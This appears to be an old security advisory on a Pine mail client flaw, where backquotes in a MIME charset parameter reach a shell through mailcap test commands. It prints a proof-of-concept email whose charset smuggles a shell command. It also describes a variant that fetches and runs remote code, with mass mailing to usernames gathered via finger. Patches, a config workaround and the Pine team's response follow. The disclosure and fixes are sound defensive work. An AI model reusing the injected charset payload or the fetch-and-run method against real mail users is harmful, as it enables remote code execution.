COMMAND
pine
SYSTEMS AFFECTED
Systems running Pine up to v4.10
PROBLEM
Michal Zalewski found following. About few months ago, he
reported vunerability in metamail package used with pine. He also
noticed that '`' character is incorrectly expanded by pine.
Problem has been ignored (probably noone understood what was he
talking about?). But no matter. An exception from /etc/mailcap:
text/plain; shownonascii iso-8859-1 %s; test=test "`echo %{charset} | tr '[A-Z]' '[a-z]'`" = iso-8859-1; copiousoutput
And now, ladies and gentelmen - Michal's old bug, reinvented.
Usually, above mailcap line is expanded to:
[...] execve </bin/sh> (sh) (-c) (test "`echo 'US-ASCII' | tr '[A-Z]' '[a-z]'`" = iso-8859-1)
Hmm, but take a look at this message:
************************** MIME MESSAGE FOLLOWS **************************
From: Attacker <attacker@eleet.net>
To: Victim <victim@somewhere.net>
Subject: Happy birthday
...
MIME-Version: 1.0
Content-Type: MULTIPART/MIXED; BOUNDARY="8323328-235065145-918425607=:319"
--8323328-235065145-918425607=:319
Content-Type: TEXT/PLAIN; charset='US-ASCII'
Make a wish...
--8323328-235065145-918425607=:319
Content-Type: TEXT/PLAIN; charset=``touch${IFS}ME``; name="logexec.c"
Content-Transfer-Encoding: BASE64
Content-Description: wish
Content-Disposition: attachment; filename="wish.c"
...it could be your last.
*************************** MIME MESSAGE ENDS ***************************
The result is:
[...] execve </bin/sh> (sh) (-c) (test "`echo '``touch${IFS}ME``' | tr '[A-Z]' '[a-z]'`" = iso-8859-1)
...and arbitrary code ('touch ME', encoded using ${IFS} trick) is
executed when message is viewed.
Elaich Of Hhp found following bigger problem with the charset bug
then imagined. With a uuencode/uudecode method in the charset,
and an index.html of a site, it's possible to run any
program/script wanted to on the remote system. When the email
is read it launches lynx -source and grabs the index.html which
is then uudecoded and ran. This includes root and non-root users
infected. Many big servers run pine, and having fingerd running,
most of the time allows us complete access to get every username
on the server, which then is simple to send the infected emails to
each user. PHP has tested this on their own systems with full
success. These operating systems include BSD, Linux, IRIX,
AIX, SCO, and SunOS. hhp-pine.tar is available to download at:
http://hhp.hemp.net/
SOLUTION
In config there is a FEATURE: show-plain-text-internally.
Enabling this feature causes Pine to ignore any external viewer
settings and always display text with Pine's internal viewer.
So, it disables the destructive impact of the "feature" found.
Terence C. Haddock made a patch. Same thing can be applied to
Pine 4.04 (the version of Pine that RedHat 5.2 uses by default),
and have made both a source and binary RPM utilizing this patch
for RedHat 4.2 (libc5) systems, available here:
http://www.samiam.org/blackdragon
To apply, download and un-tar the pine 4.10 source. Copy the
patch into the pine4.10 directory. Change directory to the
pine4.10 directory and run patch against it. This patch fixes the
hole in Zalewski's post, it modifies mailcap.c. Pine quotes
parameters sent to scripts with single quotes ('), and correctly
escapes single quotes within the parameter with the sequence '\''
(quote, slash quote quote). My patch makes it also escape
backquotes (`), replacing them with the sequence '\`'.
--- pine4.10.orig/pine/mailcap.c Wed Nov 18 13:00:15 1998
+++ pine4.10/pine/mailcap.c Mon Feb 8 09:17:46 1999
@@ -905,14 +905,18 @@
* have to put those outside of the single quotes.
* (The parm+1000 nonsense is to protect against
* malicious mail trying to overlow our buffer.)
+ *
+ * TCH - Change 2/8/1999
+ * Also quote the ` slash to prevent execution of arbirtrary code
*/
for(p = parm; *p && p < parm+1000; p++){
- if(*p == '\''){
+ if((*p == '\'')||(*p=='`')){
*to++ = '\''; /* closing quote */
*to++ = '\\';
- *to++ = '\''; /* below will be opening quote */
- }
- *to++ = *p;
+ *to++ = *p; /* quoted character */
+ *to++ = '\''; /* opening quote */
+ } else
+ *to++ = *p;
}
fs_give((void **) &parm);
@@ -954,7 +958,7 @@
*/
if(!used_tmp_file && tmp_file)
sprintf(to, MC_ADD_TMP, tmp_file);
-
+
return(cpystr(tmp_20k_buf));
}
Pine team believes the following to be true:
o There is indeed a vulnerability in the default *mailcap* file
distributed with the popular metamail MIME-support package.
o This same mailcap file has in the past been included in Pine
distributions as a sample; however, this sample file is not
used by Pine unless it is manually installed and renamed.
o While the metamail package *can* be used with Pine, Pine does
not *require* the installation of metamail.
o If a site chooses to install metamail, they should definitely
expunge the dangerous entries from the default mailcap file.
Such a corrected mailcap file is attached.
o If correcting the system mailcap file is not immediately
possible, users may wish to set Pine's "mailcap-search-path"
variable to a personal mailcap file path. (See Pine's
Main/Setup/Config screen.)
o Everyone should beware of offered workarounds in the form of
Pine patches that simply insert the shell-escape character
before any substituted back-quotes, as this only results in
moving the problem down one level of shell-nesting.
o PC-Pine users are not vulnerable to these dangerous mailcap
entries.
While one could modify Pine to guard against the particular
exploit permitted by the mailcap entries in question, it is very
difficult to conceive of a truly safe "paranoid mode" other than
disabling parameter substitution entirely. However, PT suspects
most people will find it far easier to remove any unsafe entries
from their mailcap configuration file.
--4100290-15032-918699671=:-197051
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="mailcap.sample"
Content-Transfer-Encoding: BASE64
Content-ID:
Content-Description:
Content-Disposition: attachment; filename="mailcap.sample"
IyBUaGlzIGlzIGEgc2FtcGxlIG1haWxjYXAgZmlsZSBiYXNlZCBvbiB0aGUg
c2FtcGxlIG1haWxjYXAgZmlsZQ0KIyBjb250YWluZWQgaW4gdGhlIG1ldGFt
YWlsIGRpc3RyaWJ1dGlvbiAodmVyc2lvbiAyLjcpIGZyb20gQmVsbGNvcmUu
DQojIFRoaXMgc2FtcGxlIGlzIGZvciBhIFVuaXggc3lzdGVtLiAgTG9vayBh
dCB0aGUgb3JpZ2luYWwgc2FtcGxlIGZyb20NCiMgdGhlIG1ldGFtYWlsIGRp
c3RyaWJ1dGlvbiBmb3IgbW9yZSBpZGVhcy4gIFRoaXMgaXMgYSBzaW1wbGlm
aWVkIHZlcnNpb24NCiMgdG8gZXhwbGFpbiBob3cgaXQgd29ya3Mgd2l0aCBQ
aW5lLiAgQXMgb2YgT2N0b2JlciwgMTk5NCwgbWV0YW1haWwgd2FzDQojIGF2
YWlsYWJsZSB2aWEgYW5vbnltb3VzIGZ0cCBmcm9tIHRoZSBob3N0IHRodW1w
ZXIuYmVsbGNvcmUuY29tIGluIHRoZQ0KIyBmaWxlIC9wdWIvbnNiL21tMi43
LnRhci5aLg0KIw0KIyBNZXRhbWFpbCBpczoNCiMgQ29weXJpZ2h0IChjKSAx
OTkxIEJlbGwgQ29tbXVuaWNhdGlvbnMgUmVzZWFyY2gsIEluYy4gKEJlbGxj
b3JlKQ0KIyANCiMgUGVybWlzc2lvbiB0byB1c2UsIGNvcHksIG1vZGlmeSwg
YW5kIGRpc3RyaWJ1dGUgdGhpcyBtYXRlcmlhbCANCiMgZm9yIGFueSBwdXJw
b3NlIGFuZCB3aXRob3V0IGZlZSBpcyBoZXJlYnkgZ3JhbnRlZCwgcHJvdmlk
ZWQgDQojIHRoYXQgdGhlIGFib3ZlIGNvcHlyaWdodCBub3RpY2UgYW5kIHRo
aXMgcGVybWlzc2lvbiBub3RpY2UgDQojIGFwcGVhciBpbiBhbGwgY29waWVz
LCBhbmQgdGhhdCB0aGUgbmFtZSBvZiBCZWxsY29yZSBub3QgYmUgDQojIHVz
ZWQgaW4gYWR2ZXJ0aXNpbmcgb3IgcHVibGljaXR5IHBlcnRhaW5pbmcgdG8g
dGhpcyANCiMgbWF0ZXJpYWwgd2l0aG91dCB0aGUgc3BlY2lmaWMsIHByaW9y
IHdyaXR0ZW4gcGVybWlzc2lvbiANCiMgb2YgYW4gYXV0aG9yaXplZCByZXBy
ZXNlbnRhdGl2ZSBvZiBCZWxsY29yZS4gIEJFTExDT1JFIA0KIyBNQUtFUyBO
TyBSRVBSRVNFTlRBVElPTlMgQUJPVVQgVEhFIEFDQ1VSQUNZIE9SIFNVSVRB
QklMSVRZIA0KIyBPRiBUSElTIE1BVEVSSUFMIEZPUiBBTlkgUFVSUE9TRS4g
IElUIElTIFBST1ZJREVEICJBUyBJUyIsIA0KIyBXSVRIT1VUIEFOWSBFWFBS
RVNTIE9SIElNUExJRUQgV0FSUkFOVElFUy4NCiMNCiMgVGhlIG1haWxjYXAg
dmlld2VycyBhcmUgdXNlZCBieSBQaW5lIHdoZW4gdmlld2luZyBwaWVjZXMg
b2YgYSBtZXNzYWdlDQojIGZyb20gd2l0aGluIHRoZSBhdHRhY2htZW50IHZp
ZXdlci4gIFRoYXQgaXMsIHlvdSB0eXBlIHRoZSAiViIgY29tbWFuZA0KIyB3
aGVuIGFscmVhZHkgdmlld2luZyBhIG1lc3NhZ2UuDQojDQojIFBpbmUgZXhw
ZWN0cyB0aGUgbWFpbGNhcCBmaWxlIHRvIGJlIGluIC9ldGMvbWFpbGNhcCBv
biBVbml4IHN5c3RlbXMuDQojIFVzZXJzIG1heSBvdmVycmlkZSBvciBleHRl
bmQgdGhpcyB3aXRoIGEgLm1haWxjYXAgZmlsZSBpbiB0aGVpciBob21lDQoj
IGRpcmVjdG9yeS4gIFRoZSBjb250ZW50cyBvZiB0aGF0IHdpbGwgYmUgY29t
YmluZWQgd2l0aCAvZXRjL21haWxjYXAuDQojIFVzZXJzIG1heSBvdmVycmlk
ZSB0aGlzIHN0YW5kYXJkIFBpbmUgbWFpbGNhcCBwYXRoDQojICgifi8ubWFp
bGNhcDovZXRjL21haWxjYXAiKSBieSBkZWZpbmluZyB0aGUgZW52aXJvbm1l
bnQgdmFyaWFibGUNCiMgTUFJTENBUFMgdG8gYmUgZXF1YWwgdG8gdGhlIGNv
bG9uIHNlcGFyYXRlZCBwYXRoLg0KIw0KIyBPbiBQQydzIChET1Mgb3IgV2lu
ZG93cykgdGhlIGZpbGUgTUFJTENBUCBpcyBzZWFyY2hlZCBmb3IgZmlyc3Qg
aW4gdGhlDQojIHNhbWUgZGlyZWN0b3J5IHdoZXJlIHRoZSB1c2VyJ3MgUElO
RVJDIGlzIGxvY2F0ZWQgYW5kIHRoZW4gaW4gdGhlIHNhbWUNCiMgZGlyZWN0
b3J5IHdoZXJlIFBJTkUuRVhFIGlzIGxvY2F0ZWQuICBUaGUgZmlyc3Qgd291
bGQgYmUgdGhlIHVzZXIncyBwZXJzb25hbA0KIyBvdmVycmlkZSBmaWxlIGFu
ZCB0aGUgc2Vjb25kIHRoZSBjb21tb24gZmlsZSB1c2VkIGJ5IGFsbCB1c2Vy
cy4gICBVc2Vycw0KIyBtYXkgb3ZlcnJpZGUgdGhpcyBsb2NhdGlvbiBieSBk
ZWZpbmluZyB0aGUgZW52aXJvbm1lbnQgdmFyaWFibGUgTUFJTENBUFMNCiMg
dG8gYmUgZXF1YWwgdG8gdGhlICpzZW1pY29sb24qIHNlcGFyYXRlZCBwYXRo
Lg0KIw0KIyBQaW5lIGRvZXMgbm90IHVzZSB0aGUgImNvbXBvc2U9IiBwb3J0
aW9uIG9mIG1haWxjYXAgZW50cmllcyAoYW5kIGRvZXNuJ3QNCiMgcHJvdmlk
ZSBhIGdlbmVyYWwgbWV0aG9kIG9mIGNvbXBvc2luZyBkaWZmZXJlbnQgdHlw
ZXMgb2YgbWVzc2FnZXMpLg0KIyBQaW5lIGRvZXNuJ3QgcGF5IGF0dGVudGlv
biB0byAiY29waW91c291dHB1dCIsIGJ1dCBhbHdheXMgcGlwZXMgdGhlIG91
dHB1dA0KIyB0byBpdHMgc3RhbmRhcmQgc2Nyb2xsaW5nIHRleHQgd2luZG93
IGlmICJuZWVkc3Rlcm1pbmFsIiBpcyBub3Qgc2V0Lg0KIyBJZiAibmVlZHN0
ZXJtaW5hbCIgaXMgc2V0LCB0aGVuIFBpbmUgc2V0cyB0aGUgdGVybWluYWwg
b3IgdGVybWluYWwgd2luZG93DQojIGJhY2sgdG8gdGhlIHN0YXRlIGl0IHdh
cyBpbiB3aGVuIFBpbmUgd2FzIHN0YXJ0ZWQgYW5kIGxldHMgdGhlIHZpZXdl
ciBydW4uDQojIFdoZW4gdGhlIHZpZXdlciBmaW5pc2hlcywgUGluZSByZXNl
dHMgdGhlIHRlcm1pbmFsIGFuZCByZWRyYXdzIHRoZSBzY3JlZW4uDQojIElm
IGFueSB1c2VyIGludGVyYWN0aW9uIHdpdGggdGhlIHZpZXdlciBpcyByZXF1
aXJlZCBhbmQgdGhlIHZpZXdlciBydW5zDQojIGluIHRoZSBzYW1lIHRlcm1p
bmFsIHdpbmRvdyBhcyBQaW5lLCB0aGVuICJuZWVkc3Rlcm1pbmFsIiBzaG91
bGQgYmUgc2V0Lg0KIyBUaGUgInRlc3Q9IiBjb21tYW5kcyBhcmUgdXNlZCBh
cyBkZWZpbmVkIGluIFJGQzE1MjQsIGV4Y2VwdCB0aGF0IHRoZQ0KIyBkYXRh
IGZpbGUgaXMgbm90IGF2YWlsYWJsZSB0byB0aGUgdGVzdCBjb21tYW5kLg0K
Iw0KIyBTaW5jZSBtYWlsY2FwIGlzIG9ubHkgdXNlZCBmcm9tIHRoZSBhdHRh
Y2htZW50IHZpZXdlciwgdGhlIG1lc3NhZ2UgYmVpbmcNCiMgdmlld2VkIHdp
bGwgYWx3YXlzIGJlIGEgc2luZ2xlIHBhcnQsIHNvICJtdWx0aXBhcnQiIGVu
dHJpZXMgaW4gbWFpbGNhcCBoYXZlDQojIG5vIGVmZmVjdCBvbiBQaW5lLiAg
VHlwZSAidGV4dC9wbGFpbiIgd2l0aCAiY2hhcnNldD11c2FzY2lpIiBvciBj
aGFyc2V0DQojIG1hdGNoaW5nIHRoZSBjaGFyYWN0ZXItc2V0IHZhcmlhYmxl
IGFyZSBpbnRlcmNlcHRlZCBhbmQgZGlzcGxheWVkIGJ5IFBpbmUNCiMgaW4g
dGhlIG5vcm1hbCB3YXksIG5vdCBkaXNwbGF5ZWQgYnkgYSBtYWlsY2FwIHZp
ZXdlci4gIEJlc2lkZXMgdGhvc2UNCiMgZXhjZXB0aW9ucyBqdXN0IGxpc3Rl
ZCwgYWxsIG90aGVyIHR5cGVzIGFuZCBzdWJ0eXBlcyBhcmUgc3ViamVjdCB0
bw0KIyBiZWluZyBkaXNwbGF5ZWQgYnkgYSBtYWlsY2FwIHZpZXdlci4gIElm
IG5vIG1hdGNoIGlzIGZvdW5kIGZvciB0eXBlcyB0ZXh0DQojIG9yIG1lc3Nh
Z2UsIFBpbmUgd2lsbCBkaXNwbGF5IHRoZW0gaW4gaXRzIHVzdWFsIHdheS4N
CiMNCiMgQXMgYSBzcGVjaWFsIGNhc2UsIHRoZSAiaW1hZ2Utdmlld2VyIiB2
YXJpYWJsZSBmcm9tIHRoZSBwaW5lcmMgZmlsZSBpcw0KIyBzdXBwb3J0ZWQg
YXMgaWYgYW4gZXh0cmEgZW50cnkgZm9yIHR5cGUgaW1hZ2UvKiBjYW1lIGZp
cnN0IGluIHRoZQ0KIyBwZXJzb25hbCBtYWlsY2FwIGZpbGUuICBUaGF0J3Mg
Zm9yIGJhY2t3YXJkcyBjb21wYXRpYmlsaXR5Lg0KIw0KIw0KIyBUaGUgZm9s
bG93aW5nIGxpbmUgY2F1c2VzIHRoZSB4diBwcm9ncmFtIHRvIGJlIHVzZWQg
dG8gZGlzcGxheSBhbGwNCiMgaW1hZ2UgdHlwZXMgaWYgdGhlIERJU1BMQVkg
dmFyaWFibGUgaXMgc2V0IChpbmRpY2F0aW5nIHRoZSB1c2VyIGlzDQojIHVz
aW5nIFgpLiAgKHh2IGlzIHdyaXR0ZW4gYnkgSm9obiBCcmFkbGV5LCBicmFk
bGV5QGNpcy51cGVubi5lZHUuICBUaGVyZQ0KIyBhcmUgYWxzbyBvdGhlciBY
IGltYWdlIHZpZXdlciBwcm9ncmFtcyB5b3UgY291bGQgdXNlLCBzdWNoIGFz
IHhsb2FkaW1hZ2UuKQ0KaW1hZ2UvKjsgeHYgJXM7IHRlc3Q9dGVzdCAtbiAi
JERJU1BMQVkiDQoNCiMgVGhlIGVmZmVjdCBvZiB0aGUgZm9sbG93aW5nIGlz
IHRvIHNlbmQgQUxMIGF1ZGlvIHN1YnR5cGVzIHRvIHRoZSANCiMgc2hvd2F1
ZGlvIHByb2dyYW0uICBJZiBwb3NzaWJsZSwgaXQgd291bGQgYmUgZGVzaXJh
YmxlIHRvIGFsc28gaW5jbHVkZQ0KIyBhIHRlc3QgY29tbWFuZCB0aGF0IGNv
dWxkIGRlY2lkZSB3aGV0aGVyIG9yIG5vdCB0aGUgdXNlciBjb3VsZCBwbGF5
IGF1ZGlvLg0KIyBUaGF0IHdvdWxkIGJlIHNvbWV0aGluZyBsaWtlICJ0ZXN0
PWNhbl9kb19hdWRpbyAldCIuICAoU2hvd2F1ZGlvIGlzIGEgc2hlbGwNCiMg
c2NyaXB0IGluY2x1ZGVkIGluIHRoZSBtZXRhbWFpbCBkaXN0cmlidXRpb24u
KQ0KYXVkaW8vKjsgc2hvd2F1ZGlvICVzDQoNCiMgKFNob3dleHRlcm5hbCBp
cyBhIHNoZWxsIHNjcmlwdCBpbmNsdWRlZCBpbiB0aGUgbWV0YW1haWwgZGlz
dHJpYnV0aW9uLikNCm1lc3NhZ2UvZXh0ZXJuYWwtYm9keTsgc2hvd2V4dGVy
bmFsICVzICV7YWNjZXNzLXR5cGV9ICV7bmFtZX0gXA0KCSV7c2l0ZX0gJXtk
aXJlY3Rvcnl9ICV7bW9kZX0gJXtzZXJ2ZXJ9OyBcDQoJbmVlZHN0ZXJtaW5h
bDsgY29tcG9zZXR5cGVkID0gZXh0Y29tcG9zZSAlczsgXA0KCWRlc2NyaXB0
aW9uPSJBIHJlZmVyZW5jZSB0byBkYXRhIHN0b3JlZCBpbiBhbiBleHRlcm5h
bCBsb2NhdGlvbiINCg0KIyBJZiB5b3UgaGF2ZSBhbiBpbnRlcmFjdGl2ZSBQ
b3N0c2NyaXB0IGludGVycHJldGVyLCB5b3Ugc2hvdWxkIHRoaW5rIGNhcmVm
dWxseSANCiMgYmVmb3JlIHJlcGxhY2luZyBscHIgd2l0aCBpdCBpbiB0aGUg
Zm9sbG93aW5nIGxpbmUsIGJlY2F1c2UgUG9zdFNjcmlwdA0KIyBjYW4gYmUg
YW4gZW5vcm1vdXMgc2VjdXJpdHkgaG9sZS4gIEl0IGlzIFJFTEFUSVZFTFkg
aGFybWxlc3MNCiMgd2hlbiBzZW50IHRvIHRoZSBwcmludGVyLi4uDQphcHBs
aWNhdGlvbi9wb3N0c2NyaXB0IDsgbHByICVzIFw7IGVjaG8gU0VOVCBGSUxF
IFRPIFBSSU5URVIgO1wNCiAgICBkZXNjcmlwdGlvbj0iQSBQb3N0c2NyaXB0
IEZpbGUiOw0KIyB1bnNhZmUgYWx0ZXJuYXRpdmUNCiNhcHBsaWNhdGlvbi9w
b3N0c2NyaXB0OyBnc3ByZXZpZXcgJXMgOyAgdGVzdD10ZXN0IC1uICIkRElT
UExBWSINCg0KIyBUaGUgZm9sbG93aW5nIGdpdmVzIHJ1ZGltZW50YXJ5IGNh
cGFiaWxpdHkgZm9yIHJlY2VpdmluZyANCiMgdGV4dCBtYWlsIGluIHRoZSBJ
U08tODg1OS0xIGNoYXJhY3RlciBzZXQsIHdoaWNoIGNvdmVycyBtYW55IEV1
cm9wZWFuIA0KIyBsYW5ndWFnZXMsIGFuZCB0aGUgSVNPLTg4NTktOCBjaGFy
YWN0ZXIgc2V0LCB3aGljaCBpbmNsdWRlcyBIZWJyZXcNCiMgTm90ZSB0aGF0
IHRoZSBwaXBlIHRvIHRyIGVuc3VyZXMgdGhhdCB0aGUgIklTTyIgaXMgY2Fz
ZS1pbnNlbnNpdGl2ZS4NCiMgKFRoaXMgaXMgYWxzbyBmcm9tIG1ldGFtYWls
LikNCiMNCiMjIyMgSG93ZXZlciwgdGhleSBhcmUgY29tbWVudGVkIG91dCBo
ZXJlIGFzIHRoZXkgdXNlIGEgInRlc3QiIG1ldGhvZA0KIyMjIyB0aGF0IGNh
biBjYXVzZSBtYWxpY2lvdXMgZGF0YSBpbiB0aGUgbWVzc2FnZSdzIGNoYXJz
ZXQgcGFyYW1ldGVyDQojIyMjIHRvIGdldCBleGVjdXRlZC4gIEEgYmV0dGVy
IGFsdGVybmF0aXZlIHdvdWxkIGJlIHRvIHJlcGxhY2UgdGhlICJ0ZXN0Ig0K
IyMjIyBjb21tYW5kIHdpdGggYSBzY3JpcHQgdGhhdCBkb2VzIGEgc2FmZXIg
Y2FzZS1pbnNlbnNpdGl2ZSBjb21wYXJpc29uLg0KI3RleHQvcGxhaW47IHNo
b3dub25hc2NpaSBpc28tODg1OS04ICVzOyB0ZXN0PXRlc3QgImBlY2hvICV7
Y2hhcnNldH0gfCB0ciAnW0EtWl0nICdbYS16XSdgIiA9IGlzby04ODU5LTgg
LWEgLW4gIiRESVNQTEFZIiA7IGNvcGlvdXNvdXRwdXQNCiN0ZXh0L3BsYWlu
OyBzaG93bm9uYXNjaWkgaXNvLTg4NTktOCAlcyB8IG1vcmUgOyB0ZXN0PXRl
c3QgImBlY2hvICV7Y2hhcnNldH0gfCB0ciAnW0EtWl0nICdbYS16XSdgIiA9
IGlzby04ODU5LTg7IG5lZWRzdGVybWluYWwNCiN0ZXh0L3BsYWluOyBzaG93
bm9uYXNjaWkgaXNvLTg4NTktMSAlczsgdGVzdD10ZXN0ICJgZWNobyAle2No
YXJzZXR9IHwgdHIgJ1tBLVpdJyAnW2Etel0nYCIgPSBpc28tODg1OS0xIC1h
IC1uICIkRElTUExBWSIgOyBjb3Bpb3Vzb3V0cHV0DQojdGV4dC9wbGFpbjsg
c2hvd25vbmFzY2lpIGlzby04ODU5LTEgJXMgfCBtb3JlIDsgdGVzdD10ZXN0
ICJgZWNobyAle2NoYXJzZXR9IHwgdHIgJ1tBLVpdJyAnW2Etel0nYCIgPSBp
c28tODg1OS0xIDsgbmVlZHN0ZXJtaW5hbA0KDQojIFRoZSBmb2xsb3dpbmcg
ZGlzcGxheXMgSmFwYW5lc2UgdGV4dCBhdCBzaXRlcyB3aGVyZQ0KIyB0aGUg
Imt0ZXJtIiBwcm9ncmFtIGlzIGluc3RhbGxlZDoNCiN0ZXh0L3BsYWluOyBr
dGVybSAtZ2VvbWV0cnkgKzArMCAtZSBtb3JlICVzIC9kZXYvbnVsbDsgXA0K
CXRlc3Q9dGVzdCAiYGVjaG8gJXtjaGFyc2V0fSB8IHRyICdbQS1aXScgJ1th
LXpdJ2AiID0gaXNvLTIwMjItanANCg0KIyBUaGlzIG1hcHMgTVBFRyB2aWRl
byBkYXRhIHRvIHRoZSB2aWV3ZXIgJ21wZWdfcGxheScuDQojIChNcGVnX3Bs
YXkgaXMgcGFydCBvZiB0aGUgTVBFRyBkaXN0cmlidXRpb24gZnJvbSBUaGUg
QmVya2VsZXkgUGxhdGVhdQ0KIyBSZXNlYXJjaCBHcm91cCBhbmQgaXMgYXZh
aWxhYmxlIHZpYSBhbm9ueW1vdXMgZnRwIGZyb20gdG9lLmNzLmJlcmtlbGV5
LmVkdS4pDQp2aWRlby9tcGVnOyBtcGVnX3BsYXkgJXMgOyB0ZXN0PXRlc3Qg
LW4gIiRESVNQTEFZIg0KDQojIFRoaXMgbWFwcyBhbGwgb3RoZXIgdHlwZXMg
b2YgdmlkZW8gdG8gdGhlIHhhbmltIHZpZXdlci4gIChYYW5pbSBpcyB3cml0
dGVuDQojIGJ5IE1hcmsgUG9kbGlwZWMsIHBvZGxpcGVjQHdlbGxmbGVldC5j
b20uKQ0KdmlkZW8vKjsgeGFuaW0gJXMgOyB0ZXN0PXRlc3QgLW4gIiRESVNQ
TEFZIg0KDQojIFRoZSB4ZHZpIHByb2dyYW0gZGlzcGxheSBUZVggZHZpIGZp
bGVzIG9uIGFuIFggc2VydmVyLg0KYXBwbGljYXRpb24veC1kdmk7IHhkdmkg
JXMgOyAgdGVzdD10ZXN0IC1uICIkRElTUExBWSINCg0KIyBUeXBlIG9jdGV0
LXN0cmVhbSAoYmluYXJ5KSBkYXRhIGNhbiBiZSBkaXNwbGF5ZWQgYXMgYSBo
ZXggZHVtcCBiZWZvcmUNCiMgeW91IGRlY2lkZSB3aGV0aGVyIG9yIG5vdCB5
b3Ugd2FudCB0byBzYXZlIGl0IHRvIGEgZmlsZS4gIChIZCBpcyBqdXN0DQoj
IGEgc3RhbmRhcmQgaGV4IGR1bXAgcHJvZ3JhbS4gIFlvdSBjb3VsZCB1c2Ug
Im9kIiBpZiB5b3UgZG9uJ3QgaGF2ZSBhbg0KIyAiaGQiLiAgTmFpdmUgdXNl
cnMgbWF5IGZpbmQgdGhlIG91dHB1dCBmcm9tIHRoaXMgZW50cnkgY29uZnVz
aW5nLikNCmFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbTsgaGQ7IGNvcGlvdXNv
dXRwdXQ7IGRlc2NyaXB0aW9uPSJIZXggZHVtcCBvZiBkYXRhIg0K
--4100290-15032-918699671=:-197051
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="pine4.10.param.patch"
Content-Transfer-Encoding: BASE64
Content-ID:
Content-Description:
Content-Disposition: attachment; filename="pine4.10.param.patch"
KioqIC4vcGluZS9pbml0LmMub3JpZwlUdWUgSmFuIDI2IDExOjU3OjU2IDE5
OTkNCi0tLSAuL3BpbmUvaW5pdC5jCVR1ZSBGZWIgIDkgMTk6MjM6MDYgMTk5
OQ0KKioqKioqKioqKioqKioqDQoqKiogMTc5MSwxNzk2ICoqKioNCi0tLSAx
NzkxLDE3OTggLS0tLQ0KICAJIEZfUVVFTExfUEFSVElBTF9GRVRDSCwgTk9f
SEVMUCwgUFJFRl9OT05FfSwNCiAgCXsic2F2ZS1hZ2dyZWdhdGVzLWNvcHkt
c2VxdWVuY2UiLA0KICAJIEZfQUdHX1NFUV9DT1BZLCBOT19IRUxQLCBQUkVG
X05PTkV9LA0KKyAJeyJlbmFibGUtbWFpbGNhcC1wYXJhbS1zdWJzdGl0dXRp
b24iLA0KKyAJIEZfRE9fTUFJTENBUF9QQVJBTV9TVUJTVCwgTk9fSEVMUCwg
UFJFRl9OT05FfSwNCiAgCXsidGVybWRlZi10YWtlcy1wcmVjZWRlbmNlIiwN
CiAgCSBGX1RDQVBfV0lOUywgTk9fSEVMUCwgUFJFRl9OT05FfQ0KICAgICAg
fTsNCioqKiAuL3BpbmUvbWFpbGNhcC5jLm9yaWcJV2VkIE5vdiAxOCAxMDow
MDoxNSAxOTk4DQotLS0gLi9waW5lL21haWxjYXAuYwlUdWUgRmViICA5IDE5
OjIzOjQwIDE5OTkNCioqKioqKioqKioqKioqKg0KKioqIDczOSw3NDUgKioq
Kg0KICAgICAgZHByaW50KDUsIChkZWJ1Z2ZpbGUsICItIG1jX3Bhc3Nlc190
ZXN0IC1cbiIpKTsNCiAgDQogICAgICBpZihtYy0+dGVzdGNvbW1hbmQgJiYg
Km1jLT50ZXN0Y29tbWFuZCkNCiEgCWNtZCA9IG1jX2JsZF90ZXN0X2NtZCht
Yy0+dGVzdGNvbW1hbmQsIHR5cGUsIHN1YnR5cGUsIHBhcmFtcyk7DQogICAg
ICANCiAgICAgIGlmKCFtYy0+dGVzdGNvbW1hbmQgfHwgIWNtZCB8fCAhKmNt
ZCl7DQogIAlpZihjbWQpDQotLS0gNzM5LDc0NiAtLS0tDQogICAgICBkcHJp
bnQoNSwgKGRlYnVnZmlsZSwgIi0gbWNfcGFzc2VzX3Rlc3QgLVxuIikpOw0K
ICANCiAgICAgIGlmKG1jLT50ZXN0Y29tbWFuZCAmJiAqbWMtPnRlc3Rjb21t
YW5kKQ0KISAJaWYoIShjbWQgPSBtY19ibGRfdGVzdF9jbWQobWMtPnRlc3Rj
b21tYW5kLCB0eXBlLCBzdWJ0eXBlLCBwYXJhbXMpKSkNCiEgCSAgcmV0dXJu
KEZBTFNFKTsJLyogY291bGRuJ3QgYmUgYnVpbHQgKi8NCiAgICAgIA0KICAg
ICAgaWYoIW1jLT50ZXN0Y29tbWFuZCB8fCAhY21kIHx8ICEqY21kKXsNCiAg
CWlmKGNtZCkNCioqKioqKioqKioqKioqKg0KKioqIDc5NCw4MDAgKioqKg0K
ICAgICAgaWYobmVlZHN0ZXJtKQ0KICAgICAgICAqbmVlZHN0ZXJtID0gbWMt
Pm5lZWRzdGVybWluYWw7DQogIA0KISAgICAgY29tbWFuZCA9IG1jX2NtZF9i
bGRyKG1jLT5jb21tYW5kLCB0eXBlLCBzdWJ0eXBlLCBwYXJhbXMsIHRtcF9m
aWxlKTsNCiAgDQogICAgICBkcHJpbnQoNSwgKGRlYnVnZmlsZSwgImJ1aWx0
IGNvbW1hbmQ6ICVzXG4iLCBjb21tYW5kKSk7DQogIA0KLS0tIDc5NSw4MDIg
LS0tLQ0KICAgICAgaWYobmVlZHN0ZXJtKQ0KICAgICAgICAqbmVlZHN0ZXJt
ID0gbWMtPm5lZWRzdGVybWluYWw7DQogIA0KISAgICAgaWYoIShjb21tYW5k
ID0gbWNfY21kX2JsZHIobWMtPmNvbW1hbmQsIHR5cGUsIHN1YnR5cGUsIHBh
cmFtcywgdG1wX2ZpbGUpKSkNCiEgICAgICAgY29tbWFuZCA9IGNweXN0cigi
Iik7DQogIA0KICAgICAgZHByaW50KDUsIChkZWJ1Z2ZpbGUsICJidWlsdCBj
b21tYW5kOiAlc1xuIiwgY29tbWFuZCkpOw0KICANCioqKioqKioqKioqKioq
Kg0KKioqIDg3MSw4NzYgKioqKg0KLS0tIDg3Myw4ODQgLS0tLQ0KICAJCWJy
ZWFrOw0KICANCiAgCSAgICAgIGNhc2UgJ3snOgkJCS8qIGluc2VydCByZXF1
ZXN0ZWQgTUlNRSBwYXJhbSAqLw0KKyAJCWlmKEZfT0ZGKEZfRE9fTUFJTENB
UF9QQVJBTV9TVUJTVCwgcHNfZ2xvYmFsKSl7DQorIAkJICAgIGRwcmludCgy
LA0KKyAJCQkgICAoZGVidWdmaWxlLCAibWNfY21kX2JsZHI6IHBhcmFtIHN1
YnMgJXNcbiIsIGZyb20pKTsNCisgCQkgICByZXR1cm4oTlVMTCk7DQorIAkJ
